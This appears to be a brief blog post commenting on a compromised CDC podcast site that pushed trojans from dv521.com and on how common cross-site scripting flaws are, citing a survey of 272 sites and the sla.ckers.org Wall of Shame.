A pretty big issue that was resolved fairly quickly by the host removing the offending source but our comfort level with that site is shaky now. How did the attackers get in, did they close the hole or just put some silly putty over it? We may never know.
The CDC's podcast site! They've since brought down their system for repairs.
The dv521.com site has been removed as well but how many people already had their machines trojaned?
There are a lot of XSS bugs out there. Michael Sutton did a massive check and reliably confirmed that out of 272 sites, 47 (17.3%) of them had a XSS vulnerability. The XSS Wall of Shame at the sla.ckers.org forum never stops, most of them being non-persistent.
Some very good resources on XSS and its very real threats: